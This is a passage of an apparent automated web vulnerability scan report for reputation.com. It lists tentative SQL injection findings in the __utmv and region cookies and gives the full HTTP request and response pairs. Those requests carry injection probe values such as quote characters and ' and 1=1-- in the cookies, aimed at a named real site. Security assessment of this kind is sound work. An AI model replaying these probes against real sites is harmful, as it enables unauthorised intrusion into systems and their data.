Set-Cookie: repdef_ref_code=RCPT2; expires=Thu, 19-May-2011 01:52:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 124863
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.18. http://www.reputation.com/how_to/ [__utmv cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /how_to/

Issue detail

The __utmv cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /how_to/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv='%20and%201%3d1--%20; uuid=4dacead2acca8; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; shoppingCart=cr9mtt4r59r253pvqk5sko5292; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.42.8.1303178155074

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:22:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: shoppingCart=2g3o1bqq41sjkp0f1vq0sv54e1; expires=Sat, 19-Apr-2014 02:22:14 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 145959
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.43764305114746 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Reputation.com has grown to be the world's first comprehensive online reputation management and privacy company.We're the most experienced and most technologically innovative reputation management company of our kind. With customers in over 35 countries, Reputation.com is proud to serve a global customer base." />
<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />
<meta name="keywords" content="reputation management, online reputation management, reputation" />
<meta name="verify-v1" content="pi1LQRAKD+naJaDzv4PlrqmDzEfov8Noj8ypwExi1d8=" />
<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PA RSER_COMPATIBLE" />
<title>How To : Reputation.com</title>
<script type="text/javascript">
var GB_ROOT_DIR = "/secure/greybox/";
</script>

<!--necessary for Museo embed-->
<!--
/*
* MyFonts Webfont Build ID 742178, 2011-04-04T18:53:00-0400
*
* The fonts listed in this notice are subject to the End User License
* Agreement(s) entered into by the website owner. All other parties are
* explicitly restricted from using the Licensed Webfonts(s).
*
* You may obtain a valid license at the URLs below.
*
* Webfont: Museo Sans 700
* URL: http://new.myfonts.com/fonts/exljbris/museo-sans/700/
* Foundry: exljbris
* Copyright: Copyright (c) 2008 by Jos Buivenga. All rights reserved.
* License: http://www.myfonts.com/viewlicense?1056
* Licensed pageviews: 10,000,000/month
* CSS font-family: MuseoSans-700
* CSS font-weight: normal
*
* Webfont: Museo Sans 300
* URL: http://new.myfonts.com/fonts/exljbris/museo-sans/300/
* Foundry: exljbris
* Copyright: Copyright (c) 2008 by Jos Buivenga. All rights reserved.
* License: http://www.myfonts.com/viewlicense?1056
* Licensed pageviews: 10,000,000/month
* CSS font-
...[SNIP]...

Request 2

GET /how_to/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv='%20and%201%3d2--%20; uuid=4dacead2acca8; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; shoppingCart=cr9mtt4r59r253pvqk5sko5292; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.42.8.1303178155074

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:22:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: shoppingCart=2g3o1bqq41sjkp0f1vq0sv54e1; expires=Sat, 19-Apr-2014 02:22:16 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 145937
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.46067905426025 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Reputation.com has grown to be the world's first comprehensive online reputation management and privacy company.We're the most experienced and most technologically innovative reputation management company of our kind. With customers in over 35 countries, Reputation.com is proud to serve a global customer base." />
<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />
<meta name="keywords" content="reputation management, online reputation management, reputation" />
<meta name="verify-v1" content="pi1LQRAKD+naJaDzv4PlrqmDzEfov8Noj8ypwExi1d8=" />
<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PA RSER_COMPATIBLE" />
<title>How To : Reputation.com</title>
<script type="text/javascript">
var GB_ROOT_DIR = "/secure/greybox/";
</script>

<!--necessary for Museo embed-->
<!--
/*
* MyFonts Webfont Build ID 742178, 2011-04-04T18:53:00-0400
*
* The fonts listed in this notice are subject to the End User License
* Agreement(s) entered into by the website owner. All other parties are
* explicitly restricted from using the Licensed Webfonts(s).
*
* You may obtain a valid license at the URLs below.
*
* Webfont: Museo Sans 700
* URL: http://new.myfonts.com/fonts/exljbris/museo-sans/700/
* Foundry: exljbris
* Copyright: Copyright (c) 2008 by Jos Buivenga. All rights reserved.
* License: http://www.myfonts.com/viewlicense?1056
* Licensed pageviews: 10,000,000/month
* CSS font-family: MuseoSans-700
* CSS font-weight: normal
*
* Webfont: Museo Sans 300
* URL: http://new.myfonts.com/fonts/exljbris/museo-sans/300/
* Foundry: exljbris
* Copyright: Copyright (c) 2008 by Jos Buivenga. All rights reserved.
* License: http://www.myfonts.com/viewlicense?1056
* Licensed pageviews: 10,000,000/month
* CSS font-
...[SNIP]...

1.19. http://www.reputation.com/how_to/ [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /how_to/

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /how_to/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=20290C1D; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; uuid=4dacea0c0f343; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.5.9.1303177777739; _bizo_np_stats=753%3D327%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A1%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A1%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A1

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:56:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /how_to/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=20290C1D; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; uuid=4dacea0c0f343; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.5.9.1303177777739; _bizo_np_stats=753%3D327%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A1%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A1%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A1

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:56:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: shoppingCart=8iolc1p0lpi3p35vnlqv8dk0r5; expires=Sat, 19-Apr-2014 01:56:07 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 98933
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.7201230525970
...[SNIP]...

1.20. http://www.reputation.com/how_to/talk-with-your-kids-about-social-media-safety/ [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /how_to/talk-with-your-kids-about-social-media-safety/

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /how_to/talk-with-your-kids-about-social-media-safety/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/how_to/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4daceb8bb1719; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=3243BE4E; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D131%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A6%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A6%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A6; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.50.9.1303178295497; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:20:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /how_to/talk-with-your-kids-about-social-media-safety/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/how_to/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4daceb8bb1719; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=3243BE4E; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D131%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A6%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A6%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A6; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.50.9.1303178295497; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:20:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: shoppingCart=2g3o1bqq41sjkp0f1vq0sv54e1; expires=Sat, 19-Apr-2014 02:20:29 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 204462
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 1.4132390022278
...[SNIP]...

1.21. http://www.reputation.com/itemadded [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /itemadded

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /itemadded HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=84D716E1; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D458%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A8%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A8%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A8; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.56.8.1303178441001; uuid=4daceca02633e; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:07:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /itemadded HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=84D716E1; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D458%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A8%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A8%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A8; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.56.8.1303178441001; uuid=4daceca02633e; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 19 Apr 2011 02:07:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=qua93ksa55ud9ln7chqb63fue4; expires=Sat, 19-Apr-2014 02:07:57 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 111585
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.22. http://www.reputation.com/myprivacy [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /myprivacy

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /myprivacy HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:51:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /myprivacy HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
